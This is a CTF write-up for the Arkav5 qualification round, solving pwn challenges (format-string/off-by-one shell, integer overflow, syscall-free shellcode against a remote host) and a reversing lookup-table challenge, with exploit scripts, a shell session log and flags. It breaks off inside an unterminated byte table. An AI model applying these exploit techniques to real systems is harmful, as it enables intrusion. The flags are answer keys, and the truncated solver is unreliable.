Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

Qualification

echo (Upsolve)

category: Pwn

  • attachment: 100

Simple problem with obvious bug. Off by one error, format string attack, and backdoor function.

int sub_883()
{
  char buf; // [rsp+0h] [rbp-20h]

  read(0, &buf, 0x21uLL);
  return printf(&buf, &buf);
}
int sub_870()
{
  return system("/bin/sh");
}

Off by one error will lead the change of saved rbp and format string attack that pointed to saved rbp will lead to write on arbitrary address around stack :O. With little brute force in script(the probabilty of success is 1/16)

from pwn import *


while True:
    r = process('./echo')
    payload = '%112x%10$hhn %10$p %15$p '.ljust(0x21, chr(0x58))
    r.send(payload)
    print payload.__len__()
    line = r.recv(150).split()
    target = int(line[1], 16)
    leak = int(line[2], 16)
    if leak - target == 240:
        r.interactive()

Here is the interaction:

$ python exploit.py 
[+] Starting local process './echo': pid 31615
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31615)
[+] Starting local process './echo': pid 31617
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31617)
[+] Starting local process './echo': pid 31619
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31619)
[+] Starting local process './echo': pid 31621
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31621)
[+] Starting local process './echo': pid 31623
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31623)
[+] Starting local process './echo': pid 31625
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31625)
[+] Starting local process './echo': pid 31627
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31627)
[+] Starting local process './echo': pid 31629
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[+] Starting local process './echo': pid 31631
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31631)
[+] Starting local process './echo': pid 31633
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Process './echo' stopped with exit code 0 (pid 31633)
[+] Starting local process './echo': pid 31635
33 %112x%10$hhn %10$p %15$p XXXXXXXX
[*] Switching to interactive mode
X    ��\xff\xls
brute.py  echo          input       peda-session-dash.txt  script.py
core      exploit.py  payload.txt  peda-session-echo.txt
$ ls
brute.py  echo          input       peda-session-dash.txt  script.py
core      exploit.py  payload.txt  peda-session-echo.txt
$ 

cariuang

category: Pwn

At the first, I fuzze the binary:

Dapatkan flag jika uang anda melebihi 4.29 milyar rupiah di akhir bulan!
Apakah kamu pengusaha sukses?
asdfasdf
Maksudnya?

And when I decompile the program

// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v4; // [rsp+0h] [rbp-10h]
  unsigned int i; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v6; // [rsp+8h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  iklan(*(_QWORD *)&argc, argv, envp);
  siapsiap();
  for ( i = 1; (signed int)i <= 30; ++i )
  {
    v4 = 0;
    printf("%d Juni 2019.\n", i, *(_QWORD *)&v4);
    puts("Mau kerja berapa lama?");
    printf("Waktu: ");
    __isoc99_scanf("%d", &v4);
    if ( (v4 & 0x80000000) != 0 )
    {
      v4 = 0;
      puts("Jangan curang!");
      exit(0);
    }
    kerja(v4);
    cek_uang();
  }
  if ( (unsigned int)uang <= 0xFFB4347F )
  {
    puts("Belum sampai 4.29 milyar rupiah.");
  }
  else
  {
    printf("Selamat! Flag: ");
    system("cat flag");
  }
  return 0;
}

There is 2 mode which located in siapsiap function

unsigned __int64 siapsiap()
{
  const char *v0; // rsi
  char s; // [rsp+0h] [rbp-20h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("Apakah kamu pengusaha sukses?");
  fgets(&s, 16, stdin);
  v0 = "Iya";
  if ( !strncmp(&s, "Iya", 3uLL) )
  {
    sukses = 1;
    uang = 100000000;
  }
  else
  {
    v0 = "Tidak";
    if ( strncmp(&s, "Tidak", 5uLL) )
    {
      puts("Maksudnya?");
      exit(0);
    }
    uang = 5000;
  }
  cek_uang(&s, v0);
  return __readfsqword(0x28u) ^ v3;
}

it is "pengusaha sukses" and "pengusaha tidak sukses". When we look every type of pengusaha when they were worked.

int __fastcall kerja(int a1)
{
  int result; // eax
  int v2; // [rsp+Ch] [rbp-4h]

  if ( sukses )
  {
    uang += 500 * a1;
    result = a1 / 500;
    v2 = a1 / 500;
  }
  else
  {
    uang += a1 / 5;
    result = 5 * a1;
    v2 = 5 * a1;
  }
  while ( v2 > 0 )
  {
    result = sleep(1u);
    --v2;
  }
  return result;
}

"Pengusaha sukses" do sleep as long as the time he work divide 5. Meanwhile, "Pengusaha tidak sukses" do sleep as long as the time he work multiply by 5. Our target is to create money as much as 4289999999 or around 4.2 billion. To simpifly, "Pengusaha sukses" must sleep for 4.2miliar / 5 seconds = 26 years, but the competition is just 5 hours. Meanwhile, "Pengusaha tidak sukses" need 650 years sleep. But, one thing, 5 * a1 can lead to overflow because there was no casting. Of course I want to get married be rich as fast possible so, I choose the biggest number that can lead to overflow and the result when it times 5 is negative. Here I choose 1717986918 because when I calculate, x number in range (1717986918, 2^31) when times by 5 and modulo by 2^32 and convert it to int datatype, the result will be positive. So, payload for the input is:

Tidak
1717986918
1717986918
1717986918
1717986918
1717986918
1717986918
1717986918
1717986918
1717986918
1717986918
1717986918
1717986918
834132020
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0

Run the service with that input and get the flag

flag: Arkav5{k3rja_l3mbur_b4ga1_b3b3k}

shellcode

category: Pwn

I decompile the program and get:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  FILE *stream; // ST10_8
  signed int i; // [rsp+Ch] [rbp-14h]
  char *s; // [rsp+18h] [rbp-8h]

  setvbuf(stdout, 0LL, 2, 0LL);
  stream = fopen("flag", "r");
  fgets(::s, 27, stream);
  fclose(stream);
  puts("Enter your Shellcode : \n");
  s = (char *)mmap(0LL, 0x14uLL, 7, 33, -1, 0LL);
  fgets(s, 20, stdin);
  mprotect(s, 0x14uLL, 5);
  for ( i = 0; i <= 18; ++i )
  {
    if ( s[i] == 15 && s[i + 1] == 5 )
    {
      puts("Gak boleh syscall gan!\n");
      exit(0);
    }
  }
  ((void (__fastcall *)(char *, signed __int64))s)(s, 20LL);
  return 0LL;
}

Generate shellcode with 19 length without syscall. Which means, what I do to get flag is invoke puts(::s). But, there is a problem again here, the binary is PIE. So I just catch the offset instead of absolute address of .plt and bss segment. With help of gdb, I get address of instruction with some base address of text segment. Then I try to catch important info.

address ::s =  0x555555755080
address puts = 0x5555555547f0

value of [rsp] = 0x555555554aec
value of [rsp+8] = 0x555555554b00

So, the assembly of my shellcode at the beggining is

mov rdx, QWORD PTR [rsp]
mov rdi, rdx
add rdx, (offset_puts - value_di_top_of_stack)
add rdi, (offset_::s - value_di_top_of_stack)
call rdx

tapi itu lebih dari 19 byte. Pada saat 1 jam terakhir, saya kepikiran bahwa instruksi pop hanya membutuhkan 1 byte sementara instruksi mov membutuhkan 3 byte sehingga kode saya saya rombak menjadi But that collection of shellcode more than 19 bytes. Then I realize that pop only need 1 byte and move need 3 byte. So I change my shellcode assembly become:

pop rdx
pop rdi
add rdx, (suatu offset agar menjadi alamat puts)
add rdi, (suatu offset agar menjadi alamat ::s)
call rdx

And here is my full exploit:

from pwn import *


context(arch='amd64', bits=64, os='linux')
# r.interactive()

payload = asm(
'''
    pop rdi
    add rdi, 2098580
    pop rdx
    sub rdx, 784
    call rdx
'''
    )
r = remote('18.222.179.254', 10004)
# r = process('./shellcode')
# gdb.attach(r, '''
#   b mprotect
#   c
#   fin
#   i r rip
#   b * $rip+93
#   c
#''')
log.info(str(payload.__len__()))
log.info(payload)
r.sendline(payload)
r.interactive()

flag: Arkav5{n1ce_sh3llcode_g4n}

Kotak Es

I decompile the program

__int64 __fastcall main(signed int a1, char **a2, char **a3)
{
  char *v3; // rbp
  unsigned int v4; // ebx
  __int64 v6; // r9
  unsigned __int8 v7; // cl
  int v8; // edi
  __int64 v9; // rsi
  __int64 v10; // rcx
  _BOOL4 v11; // eax

  if ( a1 <= 1 )
  {
    v4 = 1;
    __printf_chk(1LL, "%s <flag>\n", *a2);
  }
  else
  {
    v3 = a2[1];
    v4 = 1;
    if ( (unsigned int)strlen(a2[1]) == 20 )
    {
      v6 = 0LL;
      do
      {
        v7 = v3[v6];
        v8 = 0;
        do
        {
          v9 = v7;
          v10 = v8++;
          v7 = byte_201040[256 * v10 + v9];
        }
        while ( v8 != 20 );
        v11 = byte_201020[v6++] == v7;
        v4 &= v11;
      }
      while ( v6 != 20 );
      if ( v4 )
        __printf_chk(1LL, "Arkav5{%s}\n", v3);
      v4 ^= 1u;
    }
  }
  return v4;
}

jadi in a nutshell yang dilakukan program tersebut adalah untuk tiap flag pada indeks ke i adalah mengecek bahwa byte_201040[256 * 19 + ……. byte_201040[256 * 1 + byte_201040[256 * 0 + flag[i]]]] sama dengan byte_201040[i]. Sehingga yang perlu saya lakukan adalah melakukan sedikit scripting So, in a nutshell, what program do in every char of flag in index i is check whether byte_201040[256 * 19 + ……. byte_201040[256 * 1 + byte_201040[256 * 0 + flag[i]]]] same as byte_201040[i]. So what must I do is creating a little script


akhir = '\x88\xea\xf7H\x0b5\x1a\xaa<5\x01\xdd\xca8\x0b\x01\xf7\x0b<2'
sate = '\x89\x1b\x1f\xfb=t\x0c\x88\x14\xf3\xb5\x15\x8b\xd2\xda\'3h)z9\x91\x86\xf2\xc2\xbc\x13k\xffN:\xc4\x08\xa5\xbd`aJ\x9c\x80\x0b(\xcc\x97\xd0\x8c\xbe{/\x03\xc6\x98D\xf7\x9d6\xdcr\xc1\xb3\xe8+\xa0\xc9\xf5y\x1a[\xfc\xa4\xad\x8d\xb8X\x9e\xd1\x12g\xe4A\xdbM\x8f\x85\x17\x07#\xd6\x8e\xee\x1d\x16K\x87\xcf2\xe5\x8a\xf1B\x7fTo\xe3-}C\xc5\xa7\xd7@\xc7\x1e\xcaQv\xf6\xe1\xe7i\n?\xd5\t\x96\x94\x84\x02G\xa6\x19\xdf\xd9\x1cj\xebwR]W\x0e\x82\x06\xcb!Y\xec\xfa\xc3Z\xc8\x99\r\xba\xb2\xa2\x93\x92\xde\xd3\xdd\xbb\xb1\xb6\xd8\xaf~x\xb0\xb7\xed.\x18S\x95\xa1$\x9bfnU\xaa\x10\xfe\xeac\xf4\xc0,\xb95\x05\x0f\xe0\\\x90\xae*&\xa9\x11^;\xe9\xd4d\xfd\xf8\xac\xb4\xa8\xe6s\xe2VOq\xf0EP%\x9fL>p_\xbfu\x00\x83847 \x81e"1\xcd\xa3\x04\x9aI\xabbm\xf90|\x01<l\xceFH\xef\x12\xa7\xfe\x1a\x051y\xa1\xdb\x1b\xde\x04Fv\x16\xb4\xe9\xae/\xb9\x19\x172{$\x07\xacB4(\xd8o~\x10+\x8f5rp\x96l7\xc3\xa4\xf0\x02\xd6C\xb5\x9fY\r\xb7\xb3\x11\xcd\xc5\xf9V\x14\x06\xe7\xbd\x0fz\xd2\xaaX\xfcq\x9e\x84\xf7\xa8\xa6\x03\xf1|\x89\\>ta\x9d\xc4\x9c\xc7\xf4=<\xd7n\xf2\x98\x85hH\xeaI]\xc0\x90\xe3^\xbb\xe1[\x92-\xd3\x1e\x87\xcf\xff\x0c\x83\x15\x91\x86\xab\xcc;\x18d\xe4\xfa\xc29\x8eG*_\x99\xb1\x00\xceM\xd9\xbf\'\x1fOE\xe8\x82\xed@\xe0\x13m\xd0)\x94\xcbD\xeb\x08W\xee\xda\xb8\x9bK\x80\xc6\xd5x\xe2\xb0f?A6w\xf3\xdfQ\xa2\x9a3S\xe5\xc9\x88\x0e\x0b\xad\xf5R\x81\xf6\x01\xa0\xa3\x8d\x8c\x97\xdd\xa5k\xdc\x95g\xc1j\xf8u\x7fb \x8b\xb6\xba}\x1c:Js%!\xfb\xe6\xbce&N8L\x1d\xd4Z\tTP0.,`"\xef#c\xd1U\x8a\xfd\xb2\xec\x93\xbei\xa9\xca\xaf\n\xc8\n\x8c\x81LB\x0e}~\xaeh|U_\x88\x82\xf9\xfe\xd3a\x92\xd0\xa2$\x99M\x91,\x90<=J\x00\xbb%\xb2k0\x8bQ\xb7\xc9\xc1\x98\xd6\\\x94b\xb46u-q9\x87\x9f\xce^\x9b+erC\xcb2\x85\xc05z\xab\xa1\xff\xac\xf3*\xf4Z\xbd\x80o@\xa4D\x0f\x8a\xee\rjx\xa6\x9e(\xc3\xe5\x19\x12Rp\xc2I\xea\x01?\xa0E\xad\x84\x13\xec\xcf\x9a\xa8\xbf\x1b;\xdeX\x9d)\xa5\xe4\x11K\x9c\xb8T\x8d\x16\xc7"\xf2>\xcc\xdci\x93\x18\xe2\xf6\t\xd7\x08]\xd2\xe3\x07\xb04\xef\x97\xb1 d\xeb\x10\xfa\xc6\x1ew#\xdav\xa71P\x8e3\x1d\xe8\xe0l\xd4\x14G\xd5\x03\xb6\x15f7A\xe1\xbc\xf8\xbe\x17\xd1H\xf1yNcSm\xba&\xa9\x7f\x96\xdd\xed\xf7\x05\x0ct\xcd\xb5\x04\xca\xe7\xdb.\x1c\x1f\xfc\xfd/s\xc5\x0bF\x95\xaf\xf5\xd9\xf0\xb3\xc8\xfb:`n\x1a\xa3g\x83\xe9\x06\x02{[!\xaaY8\x86\xb9\xd8\x8f\x89\xe6\xdf\xc4VOW\'E\x1bU\x17\xb2p{K6\xa6\xc7\xd5\x000[\xec#]\xa1\xd6\xf2\x1d\xb8^\xb5\x14\xe7\x98!\xf7\n\xcf\x90oT\xa0\xb4Q7\xf6\x97%\xda\xe2Ah\x04\xa4 w.\x92jnY\xeb\xcb\x1e;\xde(q\xae_\x8d4\x91t\xfd\xc8\xc4\xbc\x16\t\x82\xf4\xe0z\xabD\x95\xf9V\xb0W\xa9\xf5l)\x9f1\xbdFb\xaf\x05\x86\x9e\x1f\xfbf\x1c\xffN\x85\x94}v89\xf0\x8cd\xb13\xc3\x9be\x7f\xc1\xbe\x8a~P\xe5\xca\xe1R\xfe\x15\xee\xd9:gG\xb6\xc9\xf1\xd2\x06\xd1,a\x01\xa3c\xddO\xc2\xb3\xa7\xbf\x13\xa5\x0ei\r\xb7\xdfuB\xcd\xb9m2\x19\xed\xea\xc0"&\xe6\xe8C\x1a-\xad*\x89\x9d\x80@|\x9aH\xe9\x96\x84\\\xdb+=\xd3X\x12\xfc\x10\x9cx\x08\x03\xef\xd4\xcc>\x0f?r\xa2LI\x87<`\xd7\xaa\x83\xf8\x8b\x0c\xe3\x8eZs\xc5\xfa\xc6\'\xac\xdc\x18\xe4\x81J\xa8\x02\xf3\x11\xbb$M5/\x07Sk\xba\xd0\x8f\x88\x99\xd8\xcey\x0b\x93\xcd\x7f\xc4v\xd0\xc6)\xc1\x81\xbf+\xb2\xc9@R\x8c\xbd\x93#\x94\x97K:\xac\x9c[;`|\x8e\x05Y\xdb5C\xfb}o\xa8f\xe4\x84?!4\xa3t\xa6\xd8\xec\xe9\xa4TXi\x86\xb3\x1b\x03\x15\np\xb0\x90\xb5Ue\xf4\x0f\x9fB\xc5\xaaMP^\xbe\x9d\\D\xb98\xc3\x8f\x16d~\x07\xa1Q>\x14\xd6\xae\x99\xb1ycV\'\x12\xf5\x1d\xce\xca\x92\xfdH A\xdf\xee\x1e\xed\xbb\xd1(\x83{\xcf1\xda\xd2\x18\x88\xdc]W\x17\xfc\xefJ\xb7\xa2\xe8j\xff\x80\r\xf8\xb8\x95%\x96\xe3\xd9\x1aF\xf0\xe2\x02\x13E\x0e\xeb\xbc\x06N\x98\x9bn\xa9\xba\xde6\xf2sk\xe7/G\xb4\x85\t<\xfa\xd7\xe6O$\xc8\x01\xadw\x8dz\x0cb\xaf\xe1m\x10\xa7\x04Z\xfe\xf9\x197x\xcb\x8a\xe5\xc7\xealagr_\xc0L\x8bSh\x91\x1f\x11\xf3\xc2&\xf1\xd3-\x9e"\xf6\x87\xdd3\xd49\xa5\x9a\xccuI\xa0\xf7\x00\x89=0,\x08\xb6*\x82\x0b\xe02\x1c\xd5.q\xab\x9e\xe1\x84\x18y9\xa0-\x13\x0b\n\x8a]\xb95"\xe5$m%\xe0\x98\xda.\xf3\xcf<\x9a\x89\xf2\xd3\xf0e2\x1f\xc7>f\xecj\x0fD:\x00\x99k\xb5~\x94s\xea\x868\xb2\x92@{[\xd2\x1c\x85q\x9f\x7f\x8e\x91PI\x16&6/\x17\x88\xc2\xacE\xc5\xb8\x14\xde\xb6\xf4\xa9nw\xf7Tb\x0e\x19|\x83\xb0\xfc\xbax^\xa3\xa1\xe9\xb7\xfed\xcc\xaaH\xcb\x80F\xed_\x02\x8f\xcev\x1a\xeb\xa7\xc1\xa5\xd8\xd1L\'\xcdG\xb1\x93A\xc4\xb3\xd0\x01\xe2\x90\xe7\x96ltR7\xee\xa4\xf8\r\xa2\xca\xdch1\xe6\x15\x05\x12\x95\xdd\xbbB\x8d \x8c\xf1\xbcN`}\xdb\x82\xbf\xab3\xffc=\x06?J\xb4\x87\xe3\x9d\x9c\xd9u\x97\xfd\xf5)\xaeM\xc94\x0ca\xdf+\xfag\x810\xad\xafzZ\xd7pC\xef\xa6\x04(\xf9\xd4\x07\xd6\x1bVK*o\x1e\xc0X\x1dQ!\xd5\xfb\xf6\xe8WY\x03S;\x11i\x8b\xc8O\x08\\\xc3\xa8,\x9b\xc6\xbe\xe4\xbd\x10Ur\t#\x8f^`1\xac\xfbG\xb9 \x812m?\xdb=\xe8\x1e\x06NE+)\x9b\x0bo\x98\xc3yR\x14\x83\x13\x80g;Tc\xf3\x95\x82\xcd\xe5\xef\xdc\xd2#6\'Y\x1b.\xc2H\xeb\xae\xfd\xa7\x02v}\x97\xa6U\xf9S\xd3C\x9a\x7f3&95\xd6x\x01J\xeef\\_k\xc6|z\xb7\xb8\x03\xb4Z\x90\x87\x91*\x93b\x1f\x84\xda\x1c\xa48O\xd8qK\xec\xc4\xdd\xaa\xd0s\x08/\x1a\xfa:~\xb2t><p\x19\t\xf6\xf5\xbc\x8c\x9d\x89%F\xf0\r\xa9\x1dI"\xea\x17\xedL\x12\xd9\xcb\x11,\xa3\xadD\x9fa\xe6\x0f\xc84\xbeA\xbf\xc9\xd5\x9e\xf2i\x04V{\xa2\xa07\xfc\xde\x99\xab\xb5\xa8\xb60W\x8e]\xfe\x94j\xf7\xd7\xb3\xe3\x07u\xc1!\x8b@\xbbw\xf4\x9cM\xcc\xc0\xf1\xe7\x10l\xe4\x8ae\xdf\xe2\xafQd\xff\xf8\x96rX\xbd\xe0\x88\x15\x16\x18\x00\x05\xba\xa1\xca\x0e\xcf\x8d\x0c\n\xa5\xd1nB\xc5\xc7\x86\x92\xd4\x85\xe9hP([\xb1\xce$-\xe1\xb0\x07A>\xddf{\xbf\x8agS`\xf2\x12\xe02Tj\xa3\xda\xd0\x80/\x86\xc2o8_\xb8\xadC\xebv~^\x13MD\x1e\xa1\x1f\xabP\x87\xca=?\x1cc\xdf\x820\t\xed"\xbb\xe7U<\x11\xf9\xe2\xc8\xfc\xc9i\x97\x7f\xd9OJ\x90Zh\xcc\x1d\xf3w\xd5l\xacWz.\x14e\x84\x92\x0b\xceEq\x83\x18s\xb9\x1b5\xa5\xf4y\x9b\xae,1}-u\\3+\xa7\nF\xdc:\'\x17X\x93\xfb\x02\xa0B\x1a\xe3k7\x0f\x9fn\xb3;\x98\xd7\xbc\xbd\xde\xaf\x9c\xf5\x85\xb0\xd3\r\xf7\xc3\x03\x94\xcb\xc44\x00x\xb2d\xef6\x19Y\x91|\xe6&)\xe4%\x9a*\xe5\xfe \xf6\xba\xc0\x9d\x0c\xb4\x01\xff#\xd6\x96\xa9\x8d@\xb6\x81a\x95\x16\xf0\x0e\xd4\xfaIL\xa8p\xc1K\xd1\xd8\xe1\xcfQ\x8et!\xc6V\xa4$\x15\xe8\xe9G\xb5\xfdR[\xea\xdb\xc5\x89r\x9e\x8f\xf8\x8c9\xa2\x88b\xf1\xbe\x05\xb1\xecm\xaaN\x99\x06\xcd\x8b\x08\xb7]\x04H\xd2\xc7\xee\xa6\x10(Ym\xa2*\x16\x87n\xebo\xd3#\x1c\xd9i@\\$\xaa\xf3?\x19\x80Sf\x04\x0e\xb1\xd81\xcb\x1eM~UD\n9\xe2^(d\x9a\'R\x8dje4\x01xw\xe1\x8f\xca\x0bA\xdfV\xf0G\xab,\xd2P\xcf{[\xf8\x85\x9e\xd1\x03a\x9d\xba\xe9\xdc_FXL\x07s\xbb\xb5v;\x94\x97\xd5\xa5\xa9\t\x1d\x9c8\xb8\x8aQ\xb4/y5h\xc6H\xac\xfd\x10\xf4\xa0\xe3I|\xc0!z\xc7r\x83u+\x99&\xb7\xa80\xde\x8c\x00\xd0)\r\xafcb\x92J\x18=\xfe\xc3\xdb<\xff" \x84\x93O\xc5\x13k\x12\x06T3\xc9\xb6\xf6\x11\xf2\x96\x7f7\xbf\x82q\xc8\x90\xa6\xf1\xe7\xbc\x81\xb9\xceK\xf7\xdd\xa1\xe6`\x9bl\x1f\x8b\xbe}\xefE>\xfc\xed\xa4\xe0\xee\xc1%\xad\xbd\xeaZ.\xe8g\xd6t\x0c\x14\xfa\x896B\x1a\xec\xf9\xa3\xe5N\xb0\xfb\x15\xc2\xd7C\xae\xb2\xa7:p\xc4-\xda\x1b\x02\xd4\xcc\x0f\xe4\xb3\x882W\x8e\x08]\x91\x98\x95\x86\x9f\x17\xf5\xcd\x05\x91\xb1\xf3Nc\xd7\x93\xb2\xb9&\x14\xf9{taH#\xfd\xa3L\x1e+\xbdwx\xab\xbcB8>$\xa8\xf4Q\xf6\xb4g\xf0\x13\xe4\xc1Ov\x0b\xa16]\x03y\xb7/\x88\x1bq\x87\xd4\x96\x18^K\xc3_\xda\xa4z\xd0rl\xc0|\x83s\xe9\x8eR\x00[\xd1S}\xe5\x19\x89\x902\x17\xee\xdf\x12d\x8c0\x95F\x9cj\xe1\xd8\x8b<\x8aX\xbf\xf2o\x99`JU\xef\xa6\xcd\xb3\x0c?\xa2\x05\xfb\x9e%\xd9\x81(\xdb\x1aPA;GM\x85\\\xc7\tb\r\xcb\x82\xec\x9a\xa5=\xde \x1dV~\xfae@:\x15\x9fE\x06\xe3\xe7\xcam\x16\xf89\xbb\n\xb0\x98\xf5\xff\xbe\xad\x97\xc5\xebD\x021f,I\xe8\xc4\xea\xcch\xd5"4\xc9Yn\xf7\x9d\xc8\x10\xd2\x11W\xc2\xfc\xaf\xfe\x08\xc6\xf1u\xb6\xe0!\x86\xe6\xdd\x07\x94\xcf\x0e\x84\xaa\x9b)T-\x01\xdc\xae\xed5\x92\xd3\xba\xd6\xa0\x8d\x80i\xcek\xa7C\x1f7\x7f\xb5\'.3\x1cp\xe2\x0f*\x8f\xa9Z\x04\xac\xb8X +\xde9w\x1c\xb7\xbf\x94\\\xa2\xd3\xb4\x0b%>P\xbdx\xa1\n\xb9\'\xaa#\x10\xbbU\xc9\tc|\xe0L\x80CG\xc0\xaeB\xeb[\x8b\x9f\x8a}\xc5\xc7\x97/\xfe\x82\xfc\xe1\x95:p\xdb8\xf4\xed0\x7f\xcd\x0c\x83Wl\xba\xa6\x01h-\xb0\x9b\xc3\xa3\x1a\x18\xca\xea\xf0\xd6\x9etv\xee\xa4\xef\xb3\x98\r\xe6E\xd74\x13\xd2O\xdau\x99\xddD$\x81,\xe7V\x87F!\xb5\xaf\x88\xa8nK\xfa\xcb"\x92\x11q\xec\x07\x04\x17\x1ds\xb8\x90r5\xf6\x12\xad\xd8`\xab\xcf\x96i7.^\x8d\x9dz\x89\x0f\xd5\x91~\xdfe\xc1\x1e\xe3f\xc8\xe2_\x84\xff\xd1\xb1\xa0\x15y\xf2=m1I\xce*\xf3N\x85J\xd4<\x14\xf1\x9c\x06\xc4\xf82S\x00\xa9g)&\xdc\x8e\x0eb\xd9T\xe8\xfb\xd0\xf9d\xac\xf7\xcc]\xe56R\x86Y{\xa5\x1f3\x03\x05\xe4\xb6M\xbe\xf5\xe9o\xc2\x93\x8fA@\x16\x1baZk\x08H\x9a\x8cQ\x19;j\xc6\x02?\xa7(\xfd\xbc\xb2\x8c\xb0\xd2}\x15/d\xfbv\xb5]\xd7r\xb4\xa9f*o\xf2\x99D10\x9b\xff\xd1\x894\xcf)y\nGK\xe1\xf0\xc0j!%w\x05m\xd4\xc7+\x87\x0f2SCk\x84\x18I\x02\xd0\xb9\x8b\x9f@`Ax\xadV\x01\x0c\xc2\\\xcd\x88\x06\xdd\xfa\xabB\xe4E\x92\x83\x10\'\xbb:\xa6\xebN\xdc\xf59O\x85\xe7\xac\xc1 \t\xd8\x8d(\xa5$\x8f\x82\x81\xdb\xba\x1bJ\x9d{\xae\xb7\xb2;LW\xaf>\x9e\x07\xf1<\x80\x1a\x86\xbd\xc8U\xb38\xf3.&\xe9\x1e\xd5\xa2q\x00\x19\x94\xf6\xec\x98\xf4\x1f\xe5\xc3\xa7\x91\x0bQ^\xe8\xea\x16\xf9\x97\x08\x96\xb8\x04t"\x0e|\xd9\xc4\x8a\xa8\xee\rZ\x1d\xb1_\xcaX\x7f\xa3\x17zs\x9c\xe6\xa15\xc5nF\x14\xbfbT\xc6\xd6\xdf\xbc,\x13\xef\x95g\xcb\xb6\xc9\xe2\xe0P\xcc\xce\x03[Y\xda\x90h\xbe\xd3i\xde\x93\xf7H?\x8e\xa0\xe3~#c\x11\xf8\xfdlM6a\xa4\x12R\xfc3\x1cp\x9a7-ue=\xaa\xfe\xedKS+\x1b\xdc\x05 \x14r_\x89\x00\xf7&\xe1\x1a\x81\x87\x9eN)-5\xdb"l\x9a\x850P/\xb9R\xddu\xb2\xeb!\xb7H\x86\x8e\xa8\xf0y\x95\x98=\r7\xc2\xaaD\x83\x9fk\x114\xd1\x8bbs\xe83\xd7\xa4z\x1f\xed\xea\xb8O\xb6\xc4\xba\xa0Y\xa7\x1cv\x96\x12G\x80\xbc\xb3;>[(\xfc\x01V\xdaha\xa6\xd3\x8dq\xcf@\xbf\xcb\xf4<\xcdE\xf2\xe6Ix\x0f\xe4\x91]\xae\xc3B28*\xd9\xf9\\\xfe\x1e\xe2\x94\x92\x9b\xf8U\x88\x19\xd6\x02\xbdLJ\xa9\x1d{o\xab.\x90\x9d\xbe\x16Q,\xaftZ\x13d\xc7\x93\xa5$\xb1\xfd\x0b6\xc8Tf\x08%\xc5\xfa\xf19Ap^\x17WMe\xc6\xe0}\xe5\xfb\xf3X\xcc\xb0i?\t\x97#`\x06\xc0\x10\x8c\xbb\x9c\x0e\x03w\xee\xff\x07\xe3\xe7|n\'\xac\xb51\xce\x7f\xa2\xf5\xde\xc1:m\x84\x99\xca\x8ac\xefF\xe9\xd2\xd5\x18\xad\x15\xc9\x04\xa3~\xec\xd8j\x82\xd0g\xf6\xa1\n\x8f\xd4\x0c\xdf\xb4C\xb0\xa95GP\x05\xf2\x8fm7\x13\x1f\x1dKW\xb1a\xf1,T\x95\x9f\xc6\xad\xbe\x8c\xa1\xb7$\x08\xcfZF\xc5s\xb4(\xe5ArB\x03\x12\x97/\x98=+;\xaf\xc2\x04\xccu\x83E\xfc\'\xd5\x16\x00\xa4b\x02\x86e\x85\xea\xe7@) \xdd\x07\x9a\xbb\xfd\xa2\x1cV\xb6R.\xd0x\x06\xd1\x10\xf6\x9ep\x11*J\xab\xac\xcb"\xa6\xa3\x15l\xf4\x9b\r\x88yqX]t\x8eC\xd8\x93\xf3\x8a&\n\x87z\xe4\xbc\xb2#3\xd2?\t\xce\xb9\xe9\xefU\x9d\xeeoN\xb8\x81_\xe2\xa5\x0f\x0e\xbf\x1eI\x8d\x92\xdc\xf0Lf\xc0d\x89i\xda\x1a\xc7\xc1\x19[9\xf9\x94c\xc48kM\x0c`Sh\xa0\x84!|2\xe0\xfe\x96\x14\xca\xde\xd6<\xd94\x8b\x7f\xcd\xa8\x99\x1b\xe3Y0\xec\xd7\x9c}-j\x80w\xe6\xaa\x90\xc9\xed\xe1\xb3\x0b\xd3v\x17\xbd\xae\xe8HD\xfa\x186\x82On:~\xb5\xd4\\\xf5\xc8\xc3%>\x91\xa7\xfb\xf7^Q{g1\x01\xff\xdb\xba\xf8\xeb\xdf\x1c\xae\x9bA\xb4\x8aZ\xe0N\x12\x87#\x908\x86\xc7\x14Sr\x96?~\x89\x16M<^\x9d!+\x97\x15\xb52p\xa6\x13\x10\xda\x98\x7f[\xdd_\xb2\xdc\xd6\xb1\\B\x0b\x9f;\xa5\xe7\xd9 